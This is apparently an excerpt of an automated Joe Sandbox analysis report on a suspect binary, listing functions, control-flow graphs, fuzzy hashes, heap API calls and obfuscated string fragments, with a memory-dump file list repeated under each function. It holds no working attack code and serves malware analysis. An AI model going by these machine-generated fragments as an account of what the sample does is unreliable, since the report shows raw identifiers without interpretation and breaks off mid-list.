                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    • Opcode ID: cbc41a5d6a839161e4cec55caf192a67c30886f1a10c6b786267e9fa816bc4c0
                                                                                                                    • Instruction ID: a16330bf8436ac5cc476019ae06758f805a649d64738f710c52ab2b58c3a6522
                                                                                                                    • Opcode Fuzzy Hash: cbc41a5d6a839161e4cec55caf192a67c30886f1a10c6b786267e9fa816bc4c0
                                                                                                                    • Instruction Fuzzy Hash: 5F31AAB1508301AFD718DF14C8A072ABBF2FF95344F44882CE5C6972A1E3349944CB56
                                                                                                                    Function 0010049B Relevance: .3, Instructions: 264COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 278 10049b-100515 call fc9f0 282 100370-10037e 278->282 283 1003d0-1003d7 278->283 284 100311-100320 278->284 285 100472-100477 278->285 286 100393-100397 278->286 287 100356 278->287 288 100417-100430 278->288 289 100339-10034f 278->289 290 10045b-100469 call 135700 278->290 291 1003fb-100414 278->291 292 10051c-10051e 278->292 293 1003be 278->293 294 1003de-1003e3 278->294 295 10035f-100367 278->295 296 100440-100458 call 135700 278->296 297 100480 278->297 298 100242-100244 278->298 299 100482-100484 278->299 300 100246-100260 278->300 301 100386-10038c 278->301 302 100227-10023b 278->302 303 100308-10030c 278->303 304 1003ec-1003f4 278->304 282->301 283->285 283->286 283->288 283->291 283->294 283->297 283->299 283->301 283->304 319 100327-100332 284->319 285->297 312 1003a0-1003b7 286->312 287->295 288->296 289->282 289->283 289->285 289->286 289->287 289->288 289->290 289->291 289->293 289->294 289->295 289->296 289->297 289->299 289->301 289->304 290->285 291->288 309 100520-100b30 292->309 293->283 294->304 295->282 296->290 305 100296-1002bd 298->305 310 10048d-100496 299->310 306 100262 300->306 307 100294 300->307 301->285 301->286 301->297 301->299 302->282 302->283 302->284 302->285 302->286 302->287 302->288 302->289 302->290 302->291 302->293 302->294 302->295 302->296 302->297 302->298 302->299 302->300 302->301 302->303 302->304 303->310 304->285 304->286 304->291 304->297 304->299 314 1002ea-100301 305->314 315 1002bf 305->315 313 100270-100292 call 102eb0 306->313 307->305 310->309 312->283 312->285 312->286 312->288 312->290 312->291 312->293 312->294 312->296 312->297 312->299 312->301 312->304 313->307 314->282 314->283 314->284 314->285 314->286 314->287 314->288 314->289 314->290 314->291 314->293 314->294 314->295 314->296 314->297 314->299 314->301 314->303 314->304 324 1002c0-1002e8 call 102e70 315->324 319->282 319->283 319->285 319->286 319->287 319->288 319->289 319->290 319->291 319->293 319->294 319->295 319->296 319->297 319->299 319->301 319->304 324->314
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9538e8b4573f49648a2d6d264d3aac504ce9b80a9ff66e0e5f9c00b7b01ba1b8
                                                                                                                    • Instruction ID: 924fd04b4089b158181947cdb4441203562a2d3f56b7c09a84fab2fb575145a1
                                                                                                                    • Opcode Fuzzy Hash: 9538e8b4573f49648a2d6d264d3aac504ce9b80a9ff66e0e5f9c00b7b01ba1b8
                                                                                                                    • Instruction Fuzzy Hash: 13918A75600B00CFD729CF25D894B26B7F6FF89314F118A6CE8968BAA1D770E856CB50
                                                                                                                    Function 00100228 Relevance: .2, Instructions: 218COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: df64d8066a8d35238e894f68e9f036529a3db3e14d0964f06495050ce939f34f
                                                                                                                    • Instruction ID: 2546d3a5c85376550babad2559ecbfa32f504578afcdd5cc39609f0f9bfbd705
                                                                                                                    • Opcode Fuzzy Hash: df64d8066a8d35238e894f68e9f036529a3db3e14d0964f06495050ce939f34f
                                                                                                                    • Instruction Fuzzy Hash: F5717A74600700DFD7298F24E894B27B7F6FF4A314F10896CE8868BAA2C771E856CB50
                                                                                                                    Function 001399D0 Relevance: .1, Instructions: 143COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9fa55bc84a6b389c96ced8629f500151ac6fd36cf816e2f527a3fd192a2ee2da
                                                                                                                    • Instruction ID: d8770b373e5d0ddeea701231b29902e634dc5724890a8cbadf378bfa3d98cff2
                                                                                                                    • Opcode Fuzzy Hash: 9fa55bc84a6b389c96ced8629f500151ac6fd36cf816e2f527a3fd192a2ee2da
                                                                                                                    • Instruction Fuzzy Hash: FA418E34208300ABD714DB15E890F2BFBE6EB86755F54892CF5CA9B252D3B1EC41CB62
                                                                                                                    Function 001363B8 Relevance: .1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: cc4afb5b26268335d81a027f35484f986753c01e9fcbeb04601bcd604308dda9
                                                                                                                    • Instruction ID: 85c60894903d14be3276009ee9a3b80ef9a1b05c3571c4616ea6f4fb6ff0615b
                                                                                                                    • Opcode Fuzzy Hash: cc4afb5b26268335d81a027f35484f986753c01e9fcbeb04601bcd604308dda9
                                                                                                                    • Instruction Fuzzy Hash: 45310174649301BBEB24DB04CD82F3AB7A2FB81B51FA4891CF1C15B2E1D370AC508B56
                                                                                                                    Function 00100EEC Relevance: .1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4e5987e1b08514925c663a4267c83711c7ffc12f335a13889af42dc213f982d2
                                                                                                                    • Instruction ID: 0e7e597c2f3a5453ddd1beed88eef0d21594c6e239c23aac7112335d0b0c5767
                                                                                                                    • Opcode Fuzzy Hash: 4e5987e1b08514925c663a4267c83711c7ffc12f335a13889af42dc213f982d2
                                                                                                                    • Instruction Fuzzy Hash: EC2139B4A0022A9FDB15CF94CC90BBEBBB1FB4A304F144809E451BB292C775A941CB64
                                                                                                                    Function 00133220 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 219 133220-13322f 220 1332a2-1332a6 RtlFreeHeap 219->220 221 1332a0 219->221 222 133236-133252 219->222 223 1332ac-1332b0 219->223 220->223 221->220 224 133286-133296 222->224 225 133254 222->225 224->221 226 133260-133284 call 135af0 225->226 226->224
                                                                                                                    APIs
                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000), ref: 001332A6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3298025750-0
                                                                                                                    • Opcode ID: 17c1aabc88ea35ae5f67dd47f8dece72a19bd84e329921f8aac9e6c06e4219f5
                                                                                                                    • Instruction ID: 5ac662c10577d6e02b6db77ff86d8b6f2a18b2bf97511006be09e4f74115011e
                                                                                                                    • Opcode Fuzzy Hash: 17c1aabc88ea35ae5f67dd47f8dece72a19bd84e329921f8aac9e6c06e4219f5
                                                                                                                    • Instruction Fuzzy Hash: 1001693850D2409BC701EF18E895A1ABBE8EF5AB00F058C2CE5C58B361D335DD64DBA6
                                                                                                                    Function 00133202 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 230 133202-133211 RtlAllocateHeap
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 00133208
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: a1f832c95561e3a2d12d26180060c64f5e522f410929b4a4857282acf42a573b
                                                                                                                    • Instruction ID: 4385d4ef1645c2308dbcb307c8299a3f1394404970453ee693c0f0c1dc052399
                                                                                                                    • Opcode Fuzzy Hash: a1f832c95561e3a2d12d26180060c64f5e522f410929b4a4857282acf42a573b
                                                                                                                    • Instruction Fuzzy Hash: 98B012340400005FDE041B00FC0BF003510EB0060AF800050A100040B1D56558A4C554

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0010DB6F Relevance: 32.0, Strings: 24, Instructions: 2006COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
                                                                                                                    • API String ID: 2994545307-1418943773
                                                                                                                    • Opcode ID: 27b15815926f4ebbfdad9d38bf1188dea0a1ca3b091a63e2dadfbf63d262d7ef
                                                                                                                    • Instruction ID: cb56c6d640678adf2c3d8ff3e70e8d0d472e067fb0f17668b4989d58f5a71767
                                                                                                                    • Opcode Fuzzy Hash: 27b15815926f4ebbfdad9d38bf1188dea0a1ca3b091a63e2dadfbf63d262d7ef
                                                                                                                    • Instruction Fuzzy Hash: B7F287B45083819BD774CF14C884BABBBE2BFD5304F544C2CE4C98B292DBB59995CB92
                                                                                                                    Function 001223E0 Relevance: 31.3, APIs: 4, Strings: 12, Instructions: 3298COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %*+($3<$:$Cx$`tii$aenQ$f@~!$fedc$ggxz$mlc@${l`~$|}&C
                                                                                                                    • API String ID: 0-786070067
                                                                                                                    • Opcode ID: eba0dcae9387627d66180c877db0eb51501f1d9a02f267cbf4601f73367d91fe
                                                                                                                    • Instruction ID: 658d835d99e2c9b8f1abbd69b62d9eaedf981e19498ed8943572d31c11f8a1d8
                                                                                                                    • Opcode Fuzzy Hash: eba0dcae9387627d66180c877db0eb51501f1d9a02f267cbf4601f73367d91fe
                                                                                                                    • Instruction Fuzzy Hash: CE33DE70504B918FD7258F38D590B62BBE1BF16304F58499DE4EA8BB92C335F816CBA1
                                                                                                                    Function 00119F62 Relevance: 21.7, Strings: 17, Instructions: 473COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %e6g$(a*c$=]$?m,o$CG$Gt$JG$N[$WH$]{$hi$kW$/)$S]$WQ$_Y$sm
                                                                                                                    • API String ID: 0-1131134755
                                                                                                                    • Opcode ID: b3a46de0eff93379851f5c55191a8d6d25207ee6393f7f12e81299efda252f6d
                                                                                                                    • Instruction ID: 13202d12215e1cb16424cc7e4653c52532f9da5bd853e6607a41a2d4b421b241
                                                                                                                    • Opcode Fuzzy Hash: b3a46de0eff93379851f5c55191a8d6d25207ee6393f7f12e81299efda252f6d
                                                                                                                    • Instruction Fuzzy Hash: 4E52C7B804D385CAE274CF25D581B9EBAF1BB92740F608A2DE1ED5B255DB708085CF93
                                                                                                                    Function 00119510 Relevance: 20.4, Strings: 16, Instructions: 427COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310782638.00000000003F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310960227.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310989435.0000000000587000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f0000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
                                                                                                                    • API String ID: 0-655414846
                                                                                                                    • Opcode ID: 3ec905fc6c9b767b3f8bdea55c2ae626fad199af8f69676fe76943c434ba2ecd
                                                                                                                    • Instruction ID: f293193e3cab0d352cab82b5c85939126ebf25b7df6148476cf654c44d34578f
                                                                                                                    • Opcode Fuzzy Hash: 3ec905fc6c9b767b3f8bdea55c2ae626fad199af8f69676fe76943c434ba2ecd
                                                                                                                    • Instruction Fuzzy Hash: F9F15FB4008384ABD314DF15D890A6BBBF4FB8AB48F440D2CF5D59B252D334D988CBA6
                                                                                                                    Function 002CB26A Relevance: 15.4, Strings: 11, Instructions: 1617COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1310394130.0000000000150000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1310215430.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1310394130.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
